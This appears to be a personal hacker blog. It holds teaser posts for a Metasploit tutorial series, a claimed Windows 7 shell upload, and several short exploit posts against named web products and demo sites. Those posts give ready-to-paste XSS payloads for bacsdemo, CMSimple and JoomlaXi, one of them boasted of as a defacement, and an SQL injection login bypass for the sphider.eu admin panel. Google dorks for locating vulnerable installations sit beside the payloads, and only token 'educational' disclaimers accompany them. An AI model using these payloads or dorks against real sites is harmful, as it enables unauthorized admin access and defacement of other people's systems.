Metasploit tutorial 3 – Database configuration & post exploit affairs
Hi,
Earlier in this Metasploit tutorial series, we covered the basics of the Metasploit Framework (Msf) in Part 1; created a simple exploit on a target system, and used payloads to achieve specific results. In Part 2, we explored usage of details of the meterpreter post-exploitation tool to create exploits that evade detection.
In this installment of our Metasploit tutorial, we take a detailed look at database configuration in Metasploit, and also touch upon the different post-exploitation phases.
Dig down to the bottom of the page to read the whole article unregistered on Techtarget on this link:
Cheers
3ps!l0nLaMbDa
Metasploit tutorial part 2: Using meterpreter
In Part I of our Metasploit tutorial, we covered the basics of the Metasploit Framework (MsF), created a simple exploit on a target system, and used payloads to achieve specific results. The disadvantage of using specific payloads is that alarms may be triggered when a new process starts in the target system. Ideally, a payload should avoid creation of a new process, containing all activity within the scope.
Dig down to the bottom of the page to read the whole article unregistered on Techtarget on this link:
http://searchsecurity.techtarget.in/tip/Metasploit-tutorial-part-2-Using-meterpreter
Cheers
3ps!l0nLaMbDa
Metasploit tutorial part 1: Inside the Metasploit framework
The Metasploit Framework (Msf) is a free, open source penetration testing solution developed by the open source community and Rapid7. This Metasploit tutorial covers the basic structure of Metasploit and different techniques of information gathering and vulnerability scans using this tool. Metasploit eliminates the need for writing of individual exploits, thus saving considerable time and effort.
The use of Metasploit ranges from defending your own systems by breaking into them, to learning about vulnerabilities that pose a real risk. Download Metasploit from http://www.metasploit.com to maximize the learning from this metasploit tutorial.
Dig down to the bottom of the page to read the whole article unregistered on Techtarget on this link:
http://searchsecurity.techtarget.in/tip/Metasploit-tutorial-part-1-Inside-the-Metasploit-framework
Cheers
3ps!l0nLaMbDa
Windows7 hack – shell upload
This is ms11_003_ie_css_import vulnerability being exploited using Armitage.
Here is the screeshot for the attack.
Thanks and cheers
3psil0nlambdA
Coupon codes XSSed by me ;)
vendor: www.bacsdemo.com/admindemo/
XSS vulnerability in the admin panel->static page->add new section. In html mode type the following string:
“%3E%3Ciframe src=”javascript:alert(‘XSSed by 3psil0nLamBdA’);”%3E
%3C/iframe%3E
XSS vulnerability in admin panel->tags->manage tags section.
In the search box type in the following string:
“%3E%3Cmarquee%3E%3Ch1%3EHacker%3C/h1%3E%3C/marquee%3E
The webpage is defaced with the following marquee on the screen.\m/
Cheers
3psil0nLamBdA
sphider.eu hack ~ SQLi vulnerability ~ 3pl0iteD
DISCLAIMER:
The exploit published here is just for educational purpose. 3psil0nLaMdA bears no responsibility whatsoever for the mis use of this.
——————————————————————————————————————————————————
Well guys, the demo of sphider.eu has a sql injection vulnerability.
The exploit is as follows.
username: ' or 0=0 # Password: ' or 0=0 #Click log in - And Voila!! You get access to the admin panel ;)
Until next time 3psil0nlambda signing off :)
CMSimple XSS Vulnerability 3xpl0it
* Persistent XSS vulnerability in CMSIMPLE 3.3
Google dork: Powered by CMSimple
published by: http://packetstormsecurity.org/files/author/8964/
After login to the demo with password=test, choose edit mode, and then, choose
html button in the toolbox, and write the below code, after clearing off the
existing code there. A pop up comes showing persistent xss vulnerability in the
full version.
Exploit: %3CIFRAME SRC=”javascript:alert(‘XSS’);”%3E%3C%2FIFRAME%3E
PS: In the demo, as they have mentioned in the site, the write option to files
have been disabled, unlike fullversion. So, here we can only see the way the
script behaves in the layout which shows xss vulnerability, which shall be
persistent in the full version once the write permissions are allowed.
———————————————————————————–
Thanks to side-effects for his valuable guidance and greets to taashu for her
love and support.
Cheers \m/
3psil0nLambdA
JoomlaXi persistent XSS vulnerabilities
DISCLAIMER: The author bears no responsibility for the misuse of the exploit. The exploit is published here, for the educational purpose of how to find persistent XSS vulnerabilities in a web application. Misuse of Exploits for illegal purpose is a crime and punishable under law. ------------------------------------------------------------------------ JoomlaXi persistent XSS vulnerabilty vendor: www.joomlaxi.com Author: 3psil0nLambDa Google dork: © 2008-2010 JoomlaXi. Description about the CMS JoomlaXi enrich web applications that facilitate interactive information sharing, interoperability, user-centered design, and collaboration on the World Wide Web.We are committed to develop most demanded and required applications in the field of Open Source. JoomlaXi was founded for breaking new ground and giving best solution to this world. JoomlaXi, A team since 2009, breaking its own limits every time has a large list of satisfied customers. Team has young, dynamic & talented team that drives the company passionately towards its goal. Persistent XSS vulnerability Event module in the front end, persistent XSS vulnerability Exploit: "%3E%3CIFRAME SRC="javascript:alert('XSS');"%3E%3C%2FIFRAME%3E Example: Front end demo-> markmessier->events-> type the above tags in the input fields and save the event-> View profile you ll see a pop up ;) \m/ Thanks to side-effects for his valuable guidance and greets to taashu for her love and support. Cheers \m/ Until Next time 3psil0nLamBdA signing off
3ps!l0nLaMbDa 